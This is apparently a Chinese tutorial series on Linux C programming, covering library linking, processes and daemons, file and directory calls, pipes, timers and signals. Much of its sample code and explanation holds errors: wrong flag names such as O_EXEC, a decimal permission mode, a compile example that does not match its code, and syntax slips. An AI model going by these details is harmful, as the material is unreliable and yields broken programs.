好了,我们的Makefile 也差不多了,如果想知道更多的关于Makefile规则可以查看相应的
文档.
3.程序库的链接
试着编译下面这个程序
/* temp.c */
#include <math.h>
int main(int argc,char **argv)
{
double value;
printf("Value:%f\n",value);
}
这个程序相当简单,但是当我们用 gcc -o temp temp.c 编译时会出现下面所示的错误.

/tmp/cc33Kydu.o: In function `main':
/tmp/cc33Kydu.o(.text+0xe): undefined reference to `log'
collect2: ld returned 1 exit status
出现这个错误是因为编译器找不到log的具体实现.虽然我们包括了正确的头文件,但是我
们在编译的时候还是要连接确定的库.在Linux下,为了使用数学函数,我们必须和数学库
连接,为此我们要加入 -lm 选项. gcc -o temp temp.c -lm这样才能够正确的编译.也许
有人要问,前面我们用printf函数的时候怎么没有连接库呢?是这样的,对于一些常用的函
数的实现,gcc编译器会自动去连接一些常用库,这样我们就没有必要自己去指定了. 有时
候我们在编译程序的时候还要指定库的路径,这个时候我们要用到编译器的 -L选项指定
路径.比如说我们有一个库在 /home/hoyt/mylib下,这样我们编译的时候还要加上 -L/h
ome/hoyt/mylib.对于一些标准库来说,我们没有必要指出路径.只要它们在起缺省库的路
径下就可以了.系统的缺省库的路径/lib /usr/lib /usr/local/lib 在这三个路径下面
的库,我们可以不指定路径.
还有一个问题,有时候我们使用了某个函数,但是我们不知道库的名字,这个时候怎么办呢
?很抱歉,对于这个问题我也不知道答案,我只有一个傻办法.首先,我到标准库路径下面去
找看看有没有和我用的函数相关的库,我就这样找到了线程(thread)函数的库文件(libp
thread.a). 当然,如果找不到,只有一个笨方法.比如我要找sin这个函数所在的库. 就只
好用 nm -o /lib/*.so|grep sin>~/sin 命令,然后看~/sin文件,到那里面去找了. 在s
in文件当中,我会找到这样的一行libm-2.1.2.so:00009fa0 W sin 这样我就知道了sin在
libm-2.1.2.so库里面,我用 -lm选项就可以了(去掉前面的lib和后面的版本标志,就剩
下m了所以是 -lm). 如果你知道怎么找,请赶快告诉我,我回非常感激的.谢谢!
4.程序的调试
我们编写的程序不太可能一次性就会成功的,在我们的程序当中,会出现许许多多我
们想不到的错误,这个时候我们就要对我们的程序进行调试了.
最常用的调试软件是gdb.如果你想在图形界面下调试程序,那么你现在可以选择xxgdb.记
得要在编译的时候加入 -g选项.关于gdb的使用可以看gdb的帮助文件.由于我没有用过这
个软件,所以我也不能够说出如何使用. 不过我不喜欢用gdb.跟踪一个程序是很烦的事情
,我一般用在程序当中输出中间变量的值来调试程序的.当然你可以选择自己的办法,没有
必要去学别人的.现在有了许多IDE环境,里面已经自己带了调试器了.你可以选择几个试
一试找出自己喜欢的一个用.
5.头文件和系统求助
有时候我们只知道一个函数的大概形式,不记得确切的表达式,或者是不记得着函数
在那个头文件进行了说明.这个时候我们可以求助系统.
比如说我们想知道fread这个函数的确切形式,我们只要执行 man fread 系统就会输出着
函数的详细解释的.和这个函数所在的头文件<stdio.h>说明了. 如果我们要write这个函
数的说明,当我们执行man write时,输出的结果却不是我们所需要的. 因为我们要的是w
rite这个函数的说明,可是出来的却是write这个命令的说明.为了得到write的函数说明
我们要用 man 2 write. 2表示我们用的write这个函数是系统调用函数,还有一个我们常
用的是3表示函数是C的库函数.
记住不管什么时候,man都是我们的最好助手.
------------------------------------------------------------------------
好了,这一章就讲这么多了,有了这些知识我们就可以进入激动人心的Linux下的C程序探
险活动.

2)Linux程序设计入门--进程介绍
Linux下进程的创建
前言:
这篇文章是用来介绍在Linux下和进程相关的各个概念.我们将会学到:
进程的概念
进程的身份
进程的创建
守护进程的创建
----------------------------------------------------------------------------
----
1。进程的概念
Linux操作系统是面向多用户的.在同一时间可以有许多用户向操作系统发出各种命
令.那么操作系统是怎么实现多用户的环境呢? 在现代的操作系统里面,都有程序和进程
的概念.那么什么是程序,什么是进程呢? 通俗的讲程序是一个包含可以执行代码的文件
,是一个静态的文件.而进程是一个开始执行但是还没有结束的程序的实例.就是可执行文
件的具体实现. 一个程序可能有许多进程,而每一个进程又可以有许多子进程.依次循环
下去,而产生子孙进程. 当程序被系统调用到内存以后,系统会给程序分配一定的资源(内
存,设备等等)然后进行一系列的复杂操作,使程序变成进程以供系统调用.在系统里面只
有进程没有程序,为了区分各个不同的进程,系统给每一个进程分配了一个ID(就象我们的
身份证)以便识别. 为了充分的利用资源,系统还对进程区分了不同的状态.将进程分为新
建,运行,阻塞,就绪和完成五个状态. 新建表示进程正在被创建,运行是进程正在运行,阻
塞是进程正在等待某一个事件发生,就绪是表示系统正在等待CPU来执行命令,而完成表示
进程已经结束了系统正在回收资源. 关于进程五个状态的详细解说我们可以看《操作系
统》上面有详细的解说。
2。进程的标志
上面我们知道了进程都有一个ID,那么我们怎么得到进程的ID呢?系统调用getpid可
以得到进程的ID,而getppid可以得到父进程(创建调用该函数进程的进程)的ID.
#include <unistd>
pid_t getpid(void);
pid_t getppid(void);
进程是为程序服务的,而程序是为了用户服务的.系统为了找到进程的用户名,还为进程和
用户建立联系.这个用户称为进程的所有者.相应的每一个用户也有一个用户ID.通过系统
调用getuid可以得到进程的所有者的ID.由于进程要用到一些资源,而Linux对系统资源是
进行保护的,为了获取一定资源进程还有一个有效用户ID.这个ID和系统的资源使用有关
,涉及到进程的权限. 通过系统调用geteuid我们可以得到进程的有效用户ID. 和用户ID
相对应进程还有一个组ID和有效组ID系统调用getgid和getegid可以分别得到组ID和有效
组ID
#include <unistd>
#include <sys/types.h>

uid_t getuid(void);
uid_t geteuid(void);
gid_t getgid(void);
git_t getegid(void);
有时候我们还会对用户的其他信息感兴趣(登录名等等),这个时候我们可以调用getpwui
d来得到.
struct passwd {
char *pw_name; /* 登录名称 */
char *pw_passwd; /* 登录口令 */
uid_t pw_uid; /* 用户ID */
gid_t pw_gid; /* 用户组ID */
char *pw_gecos; /* 用户的真名 */
char *pw_dir; /* 用户的目录 */
char *pw_shell; /* 用户的SHELL */
};
#include <pwd.h>
#include <sys/types.h>

struct passwd *getpwuid(uid_t uid);
下面我们学习一个实例来实践一下上面我们所学习的几个函数:
#include <unistd.h>
#include <pwd.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc,char **argv)
{
pid_t my_pid,parent_pid;
uid_t my_uid,my_euid;
gid_t my_gid,my_egid;
struct passwd *my_info;
my_pid=getpid();
parent_pid=getppid();
my_uid=getuid();
my_euid=geteuid();
my_gid=getgid();
my_egid=getegid();
my_info=getpwuid(my_uid);
printf("Process ID:%ld\n",my_pid);
printf("Parent ID:%ld\n",parent_pid);
printf("User ID:%ld\n",my_uid);
printf("Effective User ID:%ld\n",my_euid);
printf("Group ID:%ld\n",my_gid);
printf("Effective Group ID:%ld\n",my_egid):
if(my_info)
{
printf("My Login Name:%s\n" ,my_info->pw_name);
printf("My Password :%s\n" ,my_info->pw_passwd);
printf("My User ID :%ld\n",my_info->pw_uid);
printf("My Group ID :%ld\n",my_info->pw_gid);
printf("My Real Name:%s\n" ,my_info->pw_gecos);
printf("My Home Dir :%s\n", my_info->pw_dir);
printf("My Work Shell:%s\n", my_info->pw_shell);
}
}
3。进程的创建
创建一个进程的系统调用很简单.我们只要调用fork函数就可以了.
#include <unistd.h>

pid_t fork();
当一个进程调用了fork以后,系统会创建一个子进程.这个子进程和父进程不同的地方只
有他的进程ID和父进程ID,其他的都是一样.就象符进程克隆(clone)自己一样.当然创建
两个一模一样的进程是没有意义的.为了区分父进程和子进程,我们必须跟踪fork的返回
值. 当fork掉用失败的时候(内存不足或者是用户的最大进程数已到)fork返回-1,否则f
ork的返回值有重要的作用.对于父进程fork返回子进程的ID,而对于fork子进程返回0.我
们就是根据这个返回值来区分父子进程的. 父进程为什么要创建子进程呢?前面我们已经
说过了Linux是一个多用户操作系统,在同一时间会有许多的用户在争夺系统的资源.有时
进程为了早一点完成任务就创建子进程来争夺资源. 一旦子进程被创建,父子进程一起从
fork处继续执行,相互竞争系统的资源.有时候我们希望子进程继续执行,而父进程阻塞直
到子进程完成任务.这个时候我们可以调用wait或者waitpid系统调用.
#include <sys/types.h>
#include <sys/wait.h>

pid_t wait(int *stat_loc);
pid_t waitpid(pid_t pid,int *stat_loc,int options);
wait系统调用会使父进程阻塞直到一个子进程结束或者是父进程接受到了一个信号.如果
没有父进程没有子进程或者他的子进程已经结束了wait回立即返回.成功时(因一个子进
程结束)wait将返回子进程的ID,否则返回-1,并设置全局变量errno.stat_loc是子进程的
退出状态.子进程调用exit,_exit 或者是return来设置这个值. 为了得到这个值Linux定
义了几个宏来测试这个返回值.
WIFEXITED:判断子进程退出值是非0
WEXITSTATUS:判断子进程的退出值(当子进程退出时非0).
WIFSIGNALED:子进程由于有没有获得的信号而退出.
WTERMSIG:子进程没有获得的信号号(在WIFSIGNALED为真时才有意义).
waitpid等待指定的子进程直到子进程返回.如果pid为正值则等待指定的进程(pid).如果
为0则等待任何一个组ID和调用者的组ID相同的进程.为-1时等同于wait调用.小于-1时等
待任何一个组ID等于pid绝对值的进程. stat_loc和wait的意义一样. options可以决定
父进程的状态.可以取两个值 WNOHANG:父进程立即返回当没有子进程存在时. WUNTACHE
D:当子进程结束时waitpid返回,但是子进程的退出状态不可得到.
父进程创建子进程后,子进程一般要执行不同的程序.为了调用系统程序,我们可以使用系
统调用exec族调用.exec族调用有着5个函数.
#include <unistd.h>
int execl(const char *path,const char *arg,...);
int execlp(const char *file,const char *arg,...);
int execle(const char *path,const char *arg,...);
int execv(const char *path,char *const argv[]);
int execvp(const char *file,char *const argv[]):
exec族调用可以执行给定程序.关于exec族调用的详细解说可以参考系统手册(man exec
l). 下面我们来学习一个实例.注意编译的时候要加 -lm以便连接数学函数库.
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <stdio.h>
#include <errno.h>
#include <math.h>
void main(void)
{
pid_t child;
int status;
printf("This will demostrate how to get child status\n");
if((child=fork())==-1)
{
printf("Fork Error :%s\n",strerror(errno));
exit(1);
}
else if(child==0)
{
int i;
printf("I am the child:%ld\n",getpid());
for(i=0;i<1000000;i++) sin(i);
i=5;
printf("I exit with %d\n",i);
exit(i);
}
while(((child=wait(&status))==-1)&(errno==EINTR));
if(child==-1)
printf("Wait Error:%s\n",strerror(errno));
else if(!status)
printf("Child %ld terminated normally return status is zero\n",
child);
else if(WIFEXITED(status))
printf("Child %ld terminated normally return status is %d\n",
child,WEXITSTATUS(status));
else if(WIFSIGNALED(status))
printf("Child %ld terminated due to signal %d znot caught\n",
child,WTERMSIG(status));
}
strerror函数会返回一个指定的错误号的错误信息的字符串.
4。守护进程的创建
如果你在DOS时代编写过程序,那么你也许知道在DOS下为了编写一个常驻内存的程序
我们要编写多少代码了.相反如果在Linux下编写一个"常驻内存"的程序却是很容易的.我
们只要几行代码就可以做到. 实际上由于Linux是多任务操作系统,我们就是不编写代码
也可以把一个程序放到后台去执行的.我们只要在命令后面加上&符号SHELL就会把我们的
程序放到后台去运行的. 这里我们"开发"一个后台检查邮件的程序.这个程序每个一个指
定的时间回去检查我们的邮箱,如果发现我们有邮件了,会不断的报警(通过机箱上的小喇
叭来发出声音). 后面有这个函数的加强版本加强版本
后台进程的创建思想: 首先父进程创建一个子进程.然后子进程杀死父进程(是不是很无
情?). 信号处理所有的工作由子进程来处理.
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
/* Linux 的默任个人的邮箱地址是 /var/spool/mail/用户的登录名 */
#define MAIL "/var/spool/mail/hoyt"
/* 睡眠10秒钟 */

#define SLEEP_TIME 10
main(void)
{
pid_t child;
if((child=fork())==-1)
{
printf("Fork Error:%s\n",strerror(errno));
exit(1);
}
else if(child>0)
while(1);
if(kill(getppid(),SIGTERM)==-1)
{
printf("Kill Parent Error:%s\n",strerror(errno));
exit(1);
}
{
int mailfd;
while(1)
{
if((mailfd=open(MAIL,O_RDONLY))!=-1)
{
fprintf(stderr,"%s","\007");
close(mailfd);
}
sleep(SLEEP_TIME);
}
}
}
你可以在默认的路径下创建你的邮箱文件,然后测试一下这个程序.当然这个程序还有很
多地方要改善的.我们后面会对这个小程序改善的,再看我的改善之前你可以尝试自己改
善一下.比如让用户指定邮相的路径和睡眠时间等等.相信自己可以做到的.动手吧,勇敢
的探险者.
好了进程一节的内容我们就先学到这里了.进程是一个非常重要的概念,许多的程序都会
用子进程.创建一个子进程是每一个程序员的基本要求!

3)Linux程序设计入门--文件操作
Linux下文件的操作
前言:
我们在这一节将要讨论linux下文件操作的各个函数.
文件的创建和读写
文件的各个属性
目录文件的操作
管道文件
----------------------------------------------------------------------------
----
1。文件的创建和读写
我假设你已经知道了标准级的文件操作的各个函数(fopen,fread,fwrite等等).当然
如果你不清楚的话也不要着急.我们讨论的系统级的文件操作实际上是为标准级文件操作
服务的.
当我们需要打开一个文件进行读写操作的时候,我们可以使用系统调用函数open.使用完
成以后我们调用另外一个close函数进行关闭操作.
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

int open(const char *pathname,int flags);
int open(const char *pathname,int flags,mode_t mode);
int close(int fd);
open函数有两个形式.其中pathname是我们要打开的文件名(包含路径名称,缺省是认为在
当前路径下面).flags可以去下面的一个值或者是几个值的组合.
O_RDONLY:以只读的方式打开文件.
O_WRONLY:以只写的方式打开文件.
O_RDWR:以读写的方式打开文件.
O_APPEND:以追加的方式打开文件.
O_CREAT:创建一个文件.
O_EXEC:如果使用了O_CREAT而且文件已经存在,就会发生一个错误.
O_NOBLOCK:以非阻塞的方式打开一个文件.
O_TRUNC:如果文件已经存在,则删除文件的内容.
前面三个标志只能使用任意的一个.如果使用了O_CREATE标志,那么我们要使用open的第
二种形式.还要指定mode标志,用来表示文件的访问权限.mode可以是以下情况的组合.
-----------------------------------------------------------------
S_IRUSR 用户可以读 S_IWUSR 用户可以写
S_IXUSR 用户可以执行 S_IRWXU 用户可以读写执行
-----------------------------------------------------------------
S_IRGRP 组可以读 S_IWGRP 组可以写
S_IXGRP 组可以执行 S_IRWXG 组可以读写执行
-----------------------------------------------------------------
S_IROTH 其他人可以读 S_IWOTH 其他人可以写
S_IXOTH 其他人可以执行 S_IRWXO 其他人可以读写执行
-----------------------------------------------------------------
S_ISUID 设置用户执行ID S_ISGID 设置组的执行ID
-----------------------------------------------------------------
我们也可以用数字来代表各个位的标志.Linux总共用5个数字来表示文件的各种权限.
00000.第一位表示设置用户ID.第二位表示设置组ID,第三位表示用户自己的权限位,第四
位表示组的权限,最后一位表示其他人的权限.
每个数字可以取1(执行权限),2(写权限),4(读权限),0(什么也没有)或者是这几个值的和
..
比如我们要创建一个用户读写执行,组没有权限,其他人读执行的文件.设置用户ID位那么
我们可以使用的模式是--1(设置用户ID)0(组没有设置)7(1+2+4)0(没有权限,使用缺省)
5(1+4)即10705:
open("temp",O_CREAT,10705);
如果我们打开文件成功,open会返回一个文件描述符.我们以后对文件的所有操作就可以
对这个文件描述符进行操作了.
当我们操作完成以后,我们要关闭文件了,只要调用close就可以了,其中fd是我们要关闭
的文件描述符.
文件打开了以后,我们就要对文件进行读写了.我们可以调用函数read和write进行文件的
读写.
#include <unistd.h>
ssize_t read(int fd, void *buffer,size_t count);
ssize_t write(int fd, const void *buffer,size_t count);
fd是我们要进行读写操作的文件描述符,buffer是我们要写入文件内容或读出文件内容的
内存地址.count是我们要读写的字节数.
对于普通的文件read从指定的文件(fd)中读取count字节到buffer缓冲区中(记住我们必
须提供一个足够大的缓冲区),同时返回count.
如果read读到了文件的结尾或者被一个信号所中断,返回值会小于count.如果是由信号中
断引起返回,而且没有返回数据,read会返回-1,且设置errno为EINTR.当程序读到了文件
结尾的时候,read会返回0.
write从buffer中写count字节到文件fd中,成功时返回实际所写的字节数.
下面我们学习一个实例,这个实例用来拷贝文件.
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <errno.h>
#include <string.h>
#define BUFFER_SIZE 1024
int main(int argc,char **argv)
{
int from_fd,to_fd;
int bytes_read,bytes_write;
char buffer[BUFFER_SIZE];
char *ptr;
if(argc!=3)
{
fprintf(stderr,"Usage:%s fromfile tofile\n\a",argv[0]);
exit(1);
}
/* 打开源文件 */
if((from_fd=open(argv[1],O_RDONLY))==-1)
{
fprintf(stderr,"Open %s Error:%s\n",argv[1],strerror(errno));
exit(1);
}
/* 创建目的文件 */
if((to_fd=open(argv[2],O_WRONLY|O_CREAT,S_IRUSR|S_IWUSR))==-1)
{
fprintf(stderr,"Open %s Error:%s\n",argv[2],strerror(errno));
exit(1);
}
/* 以下代码是一个经典的拷贝文件的代码 */
while(bytes_read=read(from_fd,buffer,BUFFER_SIZE))
{
/* 一个致命的错误发生了 */
if((bytes_read==-1)&&(errno!=EINTR)) break;
else if(bytes_read>0)
{
ptr=buffer;
while(bytes_write=write(to_fd,ptr,bytes_read))
{
/* 一个致命错误发生了 */
if((bytes_write==-1)&&(errno!=EINTR))break;
/* 写完了所有读的字节 */
else if(bytes_write==bytes_read) break;
/* 只写了一部分,继续写 */
else if(bytes_write>0)
{
ptr+=bytes_write;
bytes_read-=bytes_write;
}
}
/* 写的时候发生的致命错误 */
if(bytes_write==-1)break;
}
}
close(from_fd);
close(to_fd);
exit(0);
}
2。文件的各个属性
文件具有各种各样的属性,除了我们上面所知道的文件权限以外,文件还有创建时间
,大小等等属性.
有时侯我们要判断文件是否可以进行某种操作(读,写等等).这个时候我们可以使用acce
ss函数.
#include <unistd.h>

int access(const char *pathname,int mode);
pathname:是文件名称,mode是我们要判断的属性.可以取以下值或者是他们的组合.
R_OK文件可以读,W_OK文件可以写,X_OK文件可以执行,F_OK文件存在.当我们测试成功时
,函数返回0,否则如果有一个条件不符时,返回-1.
如果我们要获得文件的其他属性,我们可以使用函数stat或者fstat.
#include <sys/stat.h>
#include <unistd.h>
int stat(const char *file_name,struct stat *buf);
int fstat(int filedes,struct stat *buf);
struct stat {
dev_t st_dev; /* 设备 */
ino_t st_ino; /* 节点 */
mode_t st_mode; /* 模式 */
nlink_t st_nlink; /* 硬连接 */
uid_t st_uid; /* 用户ID */
gid_t st_gid; /* 组ID */
dev_t st_rdev; /* 设备类型 */
off_t st_off; /* 文件字节数 */
unsigned long st_blksize; /* 块大小 */
unsigned long st_blocks; /* 块数 */
time_t st_atime; /* 最后一次访问时间 */
time_t st_mtime; /* 最后一次修改时间 */
time_t st_ctime; /* 最后一次改变时间(指属性) */
};
stat用来判断没有打开的文件,而fstat用来判断打开的文件.我们使用最多的属性是st_
mode.通过着属性我们可以判断给定的文件是一个普通文件还是一个目录,连接等等.可以
使用下面几个宏来判断.
S_ISLNK(st_mode):是否是一个连接.S_ISREG是否是一个常规文件.S_ISDIR是否是一个目
录S_ISCHR是否是一个字符设备.S_ISBLK是否是一个块设备S_ISFIFO是否 是一个FIFO文
件.S_ISSOCK是否是一个SOCKET文件. 我们会在下面说明如何使用这几个宏的.
3。目录文件的操作
在我们编写程序的时候，有时候会要得到我们当前的工作路径。C库函数提供了get
cwd来解决这个问题。
#include <unistd.h>

char *getcwd(char *buffer,size_t size);
我们提供一个size大小的buffer,getcwd会把我们当前的路径考到buffer中.如果buffer
太小,函数会返回-1和一个错误号.
Linux提供了大量的目录操作函数,我们学习几个比较简单和常用的函数.
#include <dirent.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
int mkdir(const char *path,mode_t mode);
DIR *opendir(const char *path);
struct dirent *readdir(DIR *dir);
void rewinddir(DIR *dir);
off_t telldir(DIR *dir);
void seekdir(DIR *dir,off_t off);
int closedir(DIR *dir);
struct dirent {
long d_ino;
off_t d_off;
unsigned short d_reclen;
char d_name[NAME_MAX+1]; /* 文件名称 */
mkdir很容易就是我们创建一个目录,opendir打开一个目录为以后读做准备.readdir读一
个打开的目录.rewinddir是用来重读目录的和我们学的rewind函数一样.closedir是关闭
一个目录.telldir和seekdir类似与ftee和fseek函数.
下面我们开发一个小程序,这个程序有一个参数.如果这个参数是一个文件名,我们输出这
个文件的大小和最后修改的时间,如果是一个目录我们输出这个目录下所有文件的大小和
修改时间.
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <dirent.h>
#include <time.h>
static int get_file_size_time(const char *filename)
{
struct stat statbuf;
if(stat(filename,&statbuf)==-1)
{
printf("Get stat on %s Error:%s\n",
filename,strerror(errno));
return(-1);
}
if(S_ISDIR(statbuf.st_mode))return(1);
if(S_ISREG(statbuf.st_mode))
printf("%s size:%ld bytes\tmodified at %s",
filename,statbuf.st_size,ctime(&statbuf.st_mtime));

return(0);
}
int main(int argc,char **argv)
{
DIR *dirp;
struct dirent *direntp;
int stats;
if(argc!=2)
{
printf("Usage:%s filename\n\a",argv[0]);
exit(1);
}
if(((stats=get_file_size_time(argv[1]))==0)||(stats==-1))exit(1);
if((dirp=opendir(argv[1]))==NULL)
{
printf("Open Directory %s Error:%s\n",
argv[1],strerror(errno));
exit(1);
}
while((direntp=readdir(dirp))!=NULL)
if(get_file_size_time(direntp-<d_name)==-1)break;
closedir(dirp);
exit(1);
}
4。管道文件
Linux提供了许多的过滤和重定向程序,比如more cat
等等.还提供了< > | <<等等重定向操作符.在这些过滤和重 定向程序当中,都用到了管
道这种特殊的文件.系统调用pipe可以创建一个管道.
#include<unistd.h>

int pipe(int fildes[2]);
pipe调用可以创建一个管道(通信缓冲区).当调用成功时,我们可以访问文件描述符fild
es[0],fildes[1].其中fildes[0]是用来读的文件描述符,而fildes[1]是用来写的文件描
述符.
在实际使用中我们是通过创建一个子进程,然后一个进程写,一个进程读来使用的.
关于进程通信的详细情况请查看进程通信
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/wait.h>
#define BUFFER 255
int main(int argc,char **argv)
{
char buffer[BUFFER+1];
int fd[2];
if(argc!=2)
{
fprintf(stderr,"Usage:%s string\n\a",argv[0]);
exit(1);
}
if(pipe(fd)!=0)
{
fprintf(stderr,"Pipe Error:%s\n\a",strerror(errno));
exit(1);
}
if(fork()==0)
{
close(fd[0]);
printf("Child[%d] Write to pipe\n\a",getpid());
snprintf(buffer,BUFFER,"%s",argv[1]);
write(fd[1],buffer,strlen(buffer));
printf("Child[%d] Quit\n\a",getpid());
exit(0);
}
else
{
close(fd[1]);
printf("Parent[%d] Read from pipe\n\a",getpid());
memset(buffer,'\0',BUFFER+1);
read(fd[0],buffer,BUFFER);
printf("Parent[%d] Read:%s\n",getpid(),buffer);
exit(1);
}
}
为了实现重定向操作,我们需要调用另外一个函数dup2.
#include <unistd.h>

int dup2(int oldfd,int newfd);
dup2将用oldfd文件描述符来代替newfd文件描述符,同时关闭newfd文件描述符.也就是说
,
所有向newfd操作都转到oldfd上面.下面我们学习一个例子,这个例子将标准输出重定向
到一个文件.
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#define BUFFER_SIZE 1024
int main(int argc,char **argv)
{
int fd;
char buffer[BUFFER_SIZE];
if(argc!=2)
{
fprintf(stderr,"Usage:%s outfilename\n\a",argv[0]);
exit(1);
}
if((fd=open(argv[1],O_WRONLY|O_CREAT|O_TRUNC,S_IRUSR|S_IWUSR))==-1)
{
fprintf(stderr,"Open %s Error:%s\n\a",argv[1],strerror(errno));
exit(1);
}
if(dup2(fd,STDOUT_FILENO)==-1)
{
fprintf(stderr,"Redirect Standard Out Error:%s\n\a",strerror(errno));
exit(1);
}
fprintf(stderr,"Now,please input string");
fprintf(stderr,"(To quit use CTRL+D)\n");
while(1)
{
fgets(buffer,BUFFER_SIZE,stdin);
if(feof(stdin))break;
write(STDOUT_FILENO,buffer,strlen(buffer));
}
exit(0);
}
好了,文件一章我们就暂时先讨论到这里,学习好了文件的操作我们其实已经可以写出一
些比较有用的程序了.我们可以编写一个实现例如dir,mkdir,cp,mv等等常用的文件操作
命令了.
想不想自己写几个试一试呢?

4)程序设计入门--时间概念
前言:Linux下的时间概念
这一章我们学习Linux的时间表示和计算函数
时间的表示
时间的测量
计时器的使用
1。时间表示 在程序当中,我们经常要输出系统当前的时间,比如我们使用date命令
的输出结果.这个时候我们可以使用下面两个函数
#include <time.h>

time_t time(time_t *tloc);
char *ctime(const time_t *clock);
time函数返回从1970年1月1日0点以来的秒数.存储在time_t结构之中.不过这个函数的返
回值对于我们来说没有什么实际意义.这个时候我们使用第二个函数将秒数转化为字符串
.. 这个函数的返回类型是固定的:一个可能值为. Thu Dec 7 14:58:59 2000 这个字符串
的长度是固定的为26
2。时间的测量 有时候我们要计算程序执行的时间.比如我们要对算法进行时间分析
..这个时候可以使用下面这个函数.
#include <sys/time.h>

int gettimeofday(struct timeval *tv,struct timezone *tz);
strut timeval {
long tv_sec; /* 秒数 */
long tv_usec; /* 微秒数 */
};
gettimeofday将时间保存在结构tv之中.tz一般我们使用NULL来代替.
#include <sys/time.h<
#include <stdio.h<
#include <math.h<
void function()
{
unsigned int i,j;
double y;
for(i=0;i<1000;i++)
for(j=0;j<1000;j++)
y=sin((double)i);
}
main()
{
struct timeval tpstart,tpend;
float timeuse;
gettimeofday(&tpstart,NULL);
function();
gettimeofday(&tpend,NULL);
timeuse=1000000*(tpend.tv_sec-tpstart.tv_sec)+
tpend.tv_usec-tpstart.tv_usec;
timeuse/=1000000;
printf("Used Time:%f\n",timeuse);
exit(0);
}
这个程序输出函数的执行时间,我们可以使用这个来进行系统性能的测试,或者是函数算
法的效率分析.在我机器上的一个输出结果是: Used Time:0.556070
3。计时器的使用 Linux操作系统为每一个进程提供了3个内部间隔计时器.
ITIMER_REAL:减少实际时间.到时的时候发出SIGALRM信号.
ITIMER_VIRTUAL:减少有效时间(进程执行的时间).产生SIGVTALRM信号.
ITIMER_PROF:减少进程的有效时间和系统时间(为进程调度用的时间).这个经常和上面一
个使用用来计算系统内核时间和用户时间.产生SIGPROF信号.
具体的操作函数是:
#include <sys/time.h>
int getitimer(int which,struct itimerval *value);
int setitimer(int which,struct itimerval *newval,
struct itimerval *oldval);
struct itimerval {
struct timeval it_interval;
struct timeval it_value;
}
getitimer函数得到间隔计时器的时间值.保存在value中 setitimer函数设置间隔计时器
的时间值为newval.并将旧值保存在oldval中. which表示使用三个计时器中的哪一个.
itimerval结构中的it_value是减少的时间,当这个值为0的时候就发出相应的信号了. 然
后设置为it_interval值.
#include <sys/time.h>
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <string.h>
#define PROMPT "时间已经过去了两秒钟\n\a"
char *prompt=PROMPT;
unsigned int len;
void prompt_info(int signo)
{
write(STDERR_FILENO,prompt,len);
}
void init_sigaction(void)
{
struct sigaction act;
act.sa_handler=prompt_info;
act.sa_flags=0;
sigemptyset(&act.sa_mask);
sigaction(SIGPROF,&act,NULL);
}
void init_time()
{
struct itimerval value;
value.it_value.tv_sec=2;
value.it_value.tv_usec=0;
value.it_interval=value.it_value;
setitimer(ITIMER_PROF,&value,NULL);
}
int main()
{
len=strlen(prompt);
init_sigaction();
init_time();
while(1);
exit(0);
}
这个程序每执行两秒中之后会输出一个提示.

5)Linux程序设计入门--信号处理
Linux下的信号事件
前言:这一章我们讨论一下Linux下的信号处理函数.
Linux下的信号处理函数:
信号的产生
信号的处理
其它信号函数
一个实例
1。信号的产生
Linux下的信号可以类比于DOS下的INT或者是Windows下的事件.在有一个信号发生时
候相信的信号就会发送给相应的进程.在Linux下的信号有以下几个. 我们使用 kill -l
命令可以得到以下的输出结果:
1) SIGHUP 2) SIGINT 3) SIGQUIT 4) SIGILL
5) SIGTRAP 6) SIGABRT 7) SIGBUS 8) SIGFPE
9) SIGKILL 10) SIGUSR1 11) SIGSEGV 12) SIGUSR2
13) SIGPIPE 14) SIGALRM 15) SIGTERM 17) SIGCHLD
18) SIGCONT 19) SIGSTOP 20) SIGTSTP 21) SIGTTIN
22) SIGTTOU 23) SIGURG 24) SIGXCPU 25) SIGXFSZ
26) SIGVTALRM 27) SIGPROF 28) SIGWINCH 29) SIGIO
30) SIGPWR
关于这些信号的详细解释请查看man 7 signal的输出结果. 信号事件的发生有两个来源
:一个是硬件的原因(比如我们按下了键盘),一个是软件的原因(比如我们使用系统函数或
者是命令发出信号). 最常用的四个发出信号的系统函数是kill, raise, alarm和setit
imer函数. setitimer函数我们在计时器的使用 那一章再学习.
#include <sys/types.h>
#include <signal.h>
#include <unistd.h>
int kill(pid_t pid,int sig);
int raise(int sig);
unisigned int alarm(unsigned int seconds);
kill系统调用负责向进程发送信号sig.
如果pid是正数,那么向信号sig被发送到进程pid.
如果pid等于0,那么信号sig被发送到所以和pid进程在同一个进程组的进程
如果pid等于-1,那么信号发给所有的进程表中的进程,除了最大的哪个进程号.
如果pid由于-1,和0一样,只是发送进程组是-pid.
我们用最多的是第一个情况.还记得我们在守护进程那一节的例子吗?我们那个时候用这
个函数杀死了父进程守护进程的创建
raise系统调用向自己发送一个sig信号.我们可以用上面那个函数来实现这个功能的.
alarm函数和时间有点关系了,这个函数可以在seconds秒后向自己发送一个SIGALRM信号
.. 下面这个函数会有什么结果呢?
#include <unistd.h>
main()
{
unsigned int i;
alarm(1);
for(i=0;1;i++)
printf("I=%d",i);
}
SIGALRM的缺省操作是结束进程,所以程序在1秒之后结束,你可以看看你的最后I值为多少
,来比较一下大家的系统性能差异(我的是2232).
2。信号操作 有时候我们希望进程正确的执行,而不想进程受到信号的影响,比如我
们希望上面那个程序在1秒钟之后不结束.这个时候我们就要进行信号的操作了.
信号操作最常用的方法是信号屏蔽.信号屏蔽要用到下面的几个函数.
#include <signal.h>
int sigemptyset(sigset_t *set);
int sigfillset(sigset_t *set);
int sigaddset(sigset_t *set,int signo);
int sigdelset(sigset_t *set,int signo);
int sigismember(sigset_t *set,int signo);
